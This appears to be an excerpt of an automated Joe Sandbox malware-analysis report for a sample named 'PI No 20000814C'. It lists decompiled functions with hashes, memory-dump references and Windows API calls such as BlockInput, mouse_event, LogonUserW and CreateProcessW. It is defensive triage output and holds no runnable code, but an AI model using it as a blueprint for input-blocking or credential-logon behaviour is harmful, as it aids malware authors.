                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                    • String ID:
                                    • API String ID: 2356834413-0
                                    • Opcode ID: deac3530e0b4bf89dd60564b881ad551e91903870d18044d611a46764f55ad6c
                                    • Instruction ID: be1d1fc0e631161c25a3525ade966bcc4027b59b0464833e37e7255ee368da6b
                                    • Opcode Fuzzy Hash: deac3530e0b4bf89dd60564b881ad551e91903870d18044d611a46764f55ad6c
                                    • Instruction Fuzzy Hash: 10F08230204228AFDF04AF49CC1AFBA3B91EB04750F004055F9469B2D2CB76A860FBF0
                                    Function 00F0189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00F01B04,?,?,?,?,?), ref: 00F018E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: dea9f8fe08daf3843efc1ff6900164768cc24759d2972b3346cc118d6f69d521
                                    • Instruction ID: e7f5216598e213c736637b218594ca94a0078fd494a59171b62007e2fd034437
                                    • Opcode Fuzzy Hash: dea9f8fe08daf3843efc1ff6900164768cc24759d2972b3346cc118d6f69d521
                                    • Instruction Fuzzy Hash: D0F05E346002199FDB18DF14D866E7637E2FB44360F508929F9528B2E1CB31D960FB50
                                    Function 00F741FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 00F74218
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: db012e0782bca7af0bf92ec146611fb0c84fc916ec519327ed7079c77c6eae0f
                                    • Instruction ID: a1c20c8bf890908dc1e21961e7c1560c0e8b3436083a5d9c2b7a376b1fb966a6
                                    • Opcode Fuzzy Hash: db012e0782bca7af0bf92ec146611fb0c84fc916ec519327ed7079c77c6eae0f
                                    • Instruction Fuzzy Hash: A3E01A322442149FD710AF59E844A9AB7E8AF947A0F00C026FC49C7252EAB4A840EBA1
                                    Function 00F8CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F8CBEE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: ab4b02973bbe657014d8c969fdb2580935a4b2ce9621de91e02821311545ef16
                                    • Instruction ID: 3ae784449ca3c2cd09bd48f1ec98288b95c60b5b7370563adebba63fa1c1ccd5
                                    • Opcode Fuzzy Hash: ab4b02973bbe657014d8c969fdb2580935a4b2ce9621de91e02821311545ef16
                                    • Instruction Fuzzy Hash: 06F06D31644259AFDB21EF58DD06FD63B95EF09720F044418BA11672E2CB707820F7A4
                                    Function 00F64EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00F64F18
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    • Opcode ID: c818cf71e2ad7fc3784d0d2e375e7c11c201d9efa9d7910e4d4e5f73390a1db5
                                    • Instruction ID: 24a1a8c90f2fa5818eaeedf4c821ec57abd9c2d3ed977dcdc63597e2a021bd7d
                                    • Opcode Fuzzy Hash: c818cf71e2ad7fc3784d0d2e375e7c11c201d9efa9d7910e4d4e5f73390a1db5
                                    • Instruction Fuzzy Hash: 7AD05EB15642093CFC186B20AC2FF761108E341BA1F94598932018B4C199E57860B434
                                    Function 00F58C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F588D1), ref: 00F58CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
                                    • Instruction ID: 2ea6c78a4e86eab450a2c385aba91aac799dab87588230bed2e1480a2950abaa
                                    • Opcode Fuzzy Hash: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
                                    • Instruction Fuzzy Hash: ACD09E3226450EAFEF019EA4DD05EFE3B69EB04B01F408511FE15D51A1C775D935AB60
                                    Function 00F8CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00F3BC0C,?,?,?,?,?,?), ref: 00F8CC24
                                      • Part of subcall function 00F8B8EF: _memset.LIBCMT ref: 00F8B8FE
                                      • Part of subcall function 00F8B8EF: _memset.LIBCMT ref: 00F8B90D
                                      • Part of subcall function 00F8B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FC7F20,00FC7F64), ref: 00F8B93C
                                      • Part of subcall function 00F8B8EF: CloseHandle.KERNEL32 ref: 00F8B94E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    • String ID:
                                    • API String ID: 2364484715-0
                                    • Opcode ID: d5f30566ef7a6089d62ea9529fc0b5137257e9fcfa4cf60770858a85719aa374
                                    • Instruction ID: 8ecdc445fe4bf6bdc8440318453708bda418d8bf32477b091fcec39f609b0601
                                    • Opcode Fuzzy Hash: d5f30566ef7a6089d62ea9529fc0b5137257e9fcfa4cf60770858a85719aa374
                                    • Instruction Fuzzy Hash: 29E0B636210248DFCB01AF44DE45E9637A5FB1D751F018055FA055B2B2CB31A960FFA0
                                    Function 00F0167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00F01AEE,?,?,?), ref: 00F016AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 24042bc2404024138733a61db8ea26d4264553e9c2e4a6372d2d58cacd5fcf19
                                    • Instruction ID: 64b9be60adfdb66976a31866e70da359ba77a1736f3371ec442c77b994474df3
                                    • Opcode Fuzzy Hash: 24042bc2404024138733a61db8ea26d4264553e9c2e4a6372d2d58cacd5fcf19
                                    • Instruction Fuzzy Hash: 90E0EC35204208BBCF45AF90DC16E653B26FF48314F108418FA454B2E2CF37A521FB60
                                    Function 00F8CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 00F8CBA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: f916953d60238b9648e336eafd873d02d559ec05797bf987e27fc34557cc1779
                                    • Instruction ID: a53812615f5b500f62d9cae1b80be7e131274528496e31d54fba6211791e6c94
                                    • Opcode Fuzzy Hash: f916953d60238b9648e336eafd873d02d559ec05797bf987e27fc34557cc1779
                                    • Instruction Fuzzy Hash: 82E0E23520020CEFCB01DF88D945DD63BA5AB1D300F004054FA054B362CB71A830EBA1
                                    Function 00F8CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 00F8CB75
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 5e823843a8b6cf39a9036ea612a16131d4dcfda5f62fcba3c7dec5270a347bef
                                    • Instruction ID: 323ea9554fd64a4d6aba795c8f03528f30e712a201a7c49e60542554ef727344
                                    • Opcode Fuzzy Hash: 5e823843a8b6cf39a9036ea612a16131d4dcfda5f62fcba3c7dec5270a347bef
                                    • Instruction Fuzzy Hash: EBE0427525424DAFDB01DF88D985E963BA5AB1D700F054054FA155B362CB71A830EB61
                                    Function 00F016B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F0201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F020D3
                                      • Part of subcall function 00F0201B: KillTimer.USER32(-00000001,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F0216E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00F01AE2,?,?), ref: 00F016D4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    • String ID:
                                    • API String ID: 2797419724-0
                                    • Opcode ID: 8238cca3592798e0f24a5d1735d6faaf9efb4db736edda64c83ff1ee62e8262f
                                    • Instruction ID: 557dcfad80337078e3800a238ad65ca22eb2b8459ad73848d0ab64a32cffaed1
                                    • Opcode Fuzzy Hash: 8238cca3592798e0f24a5d1735d6faaf9efb4db736edda64c83ff1ee62e8262f
                                    • Instruction Fuzzy Hash: FCD012302403087BDA102B50DD1FF5A3A199B58750F408420BA04691D3CA766820B568
                                    Function 00F42230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 00F42242
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 81c7efc6849f47dfe96646446650bc756f9f9e3c9a31e3bfaa24910371f3cb62
                                    • Instruction ID: 02debf24e656448e9b32c076a1d975dc09da22bf2ac870b0d4c38ac40445b6ed
                                    • Opcode Fuzzy Hash: 81c7efc6849f47dfe96646446650bc756f9f9e3c9a31e3bfaa24910371f3cb62
                                    • Instruction Fuzzy Hash: F8C04CF180010DDFDB05DB90D988DFE77BCBB04304F104155A501F2100D7749B449B71
                                    Function 00F2A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F2A36A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
                                    • Instruction ID: fcb639c40ccd47c38f5089546237dc154cba8e173aeab0b6cc0d02a8a6bbfdc9
                                    • Opcode Fuzzy Hash: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
                                    • Instruction Fuzzy Hash: ADA0113000020CAB8A002B82EC088A8BFACEA022A0B008020F80C800228B32A820AA80
                                    Function 00F18A0E Relevance: .6, Instructions: 608COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b5f6aad0b9ab62f6e28e7c2464fb65ffeacc804f57ac87952920fba6f1f9e670
                                    • Instruction ID: 081d0c578c7a76f593e2506fda5b9c1216b46b878870887f21faf5b5e14e81fc
                                    • Opcode Fuzzy Hash: b5f6aad0b9ab62f6e28e7c2464fb65ffeacc804f57ac87952920fba6f1f9e670
                                    • Instruction Fuzzy Hash: 5F224631D05656CBCF28CB14C6A47BE77A1EB417A1F28442AD9428B291DB34DDC6FBA0
                                    Function 00F22405 Relevance: .3, Instructions: 345COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: f91d4ce9cdd7c41b200ac41079a421c2846d278a62473ac55becdbcb175192c1
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 1EC181326060B309DF6D8639B53413EBAE16EA27B131A076DE4B3CB5C5EF20D564F620
                                    Function 00F2283A Relevance: .3, Instructions: 341COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: f85309298f7971c068f38d79b988b96632720d8a65ef48707fbaedaa6c9776be
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: AAC194336061B309DF6D8639B53413EBBE16AA27B131A076DE4B2DB5D4EF20D524F620
                                    Function 00F21BB8 Relevance: .3, Instructions: 323COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
